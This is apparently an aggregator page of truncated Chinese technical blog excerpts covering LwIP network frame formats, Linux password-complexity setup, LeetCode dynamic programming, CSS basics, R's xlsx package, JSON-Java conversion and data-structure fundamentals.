前言 TCP/IP 本质上是软件协议&#xff0c;而LwIP也是对软件协议进行解析处理&#xff0c;所以我们有必要了解下以太网帧、IP、TCP、UDP、IGMP、ICMP帧格式&#xff0c;这样在代码中&#xff0c;才能有的放矢。 以太网帧框架 以太网帧是最底层的原始数据&#xff0c;帧框架如…

Linux用户密码管理

密码复杂度设置 之前写过一篇文章&#xff0c;通过编辑/etc/pam.d下的配置文件来信hi先密码复杂度设置。 这里介绍另一种方法&#xff0c;使用authconfig名来配置。 如果没有安装该软件&#xff0c;输入如下命令安装: yum install authconfig -y 设置方法如下: authconfi…

力扣动态规划专题(六)编辑距离与回文问题 步骤及C++实现

文章目录 392. 判断子序列动态规划双指针 115.不同的子序列583. 两个字符串的删除操作方法一方法二 72. 编辑距离647. 回文子串动态规划双指针 516.最长回文子序列 392. 判断子序列 动态规划 步骤 确定dp数组以及下标的含义 dp[i][j] 表示以下标i-1为结尾的字符串s&#xff0c…

Json数据 通用提取工具 Web版

问题来源 楼主使用Golang 实现了一款通用型 JSON 数据提取工具&#xff0c;支持自动识别 JSON 数据节点并有序提取为 CSV 文件。 看到大家有这样的评论&#xff0c;顺手实现下&#xff0c;~~ 尴尬的是搞完了 &#xff0c;发现 这个论坛注册不足15天&#xff0c;不能回复评论。晕…

迅为RK3568开发板系统编程手册全新升级

iTOP-3568开发板C应用编程手册全新升级&#xff0c;《iTOP-RK3568开发板系统编程手册》旨在帮助刚入门的用户进行入门规划和学习&#xff0c;为系统编程基础指导手册。 第1部分 系统编程初探 第1章 系统编程初探 1.1 什么是系统编程 1.2 系统编程的作用 1.3 系统调用和C语言库函…

R语言使用xlsx包、安装包的经验以及切换工作目录的方法

R语言使用xlsx包 首先不同于读取txt和csv文件&#xff0c;R语言读取xlsx文件需要安装xlsx包 使用下面命令进行安装xlsx install.packages(“xlsx”) 安装过程非常顺利&#xff0c;需要附带安装其它几个包。如果安装出现错误&#xff0c;可以尝试切换网络&#xff0c;使用手机热…

2-css-1

一 CSS 初体验 CSS 定义&#xff1a;层叠样式表 (Cascading Style Sheets&#xff0c;缩写为 CSS&#xff09;&#xff0c;是一种样式表语言&#xff0c;用来描述HTML文档的呈现&#xff08;美化内容&#xff09; CSS 书写在什么位置&#xff1f; title 标签下方哪个标签里面…

2-css-5

一 定位 1 认识 作用&#xff1a;灵活的改变盒子在网页中的位置 实现&#xff1a; 定位模式&#xff1a;position边偏移&#xff1a;设置盒子的位置 left right top bottom 2 相对定位 position: relative 特点&#xff1a; 不脱标&#xff0c;占用自己原来位置显示模式…

如何将JSON对象转化为java对象,如何将java对象转化为JSON对象

如何将JSON对象转化为java对象&#xff0c;如何将java对象转化为JSON对象 一、在java中如何构建一个JSON对象 在java中我们可以通过创建JsonObject对象的方式来为其添加相应的参数属性&#xff0c;进而构造JSON对象 1、导入JsonObject的依赖 JsonObject是Gson库中的一个类&…

数据结构--数据结构的基本概念

数据结构–数据结构的基本概念 知识总览&#xff1a; 数据结构的三要素 #mermaid-svg-jflLhauniFK26Yxb {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-jflLhauniFK26Yxb .error-icon{fill:#552222;}#mermaid-svg-…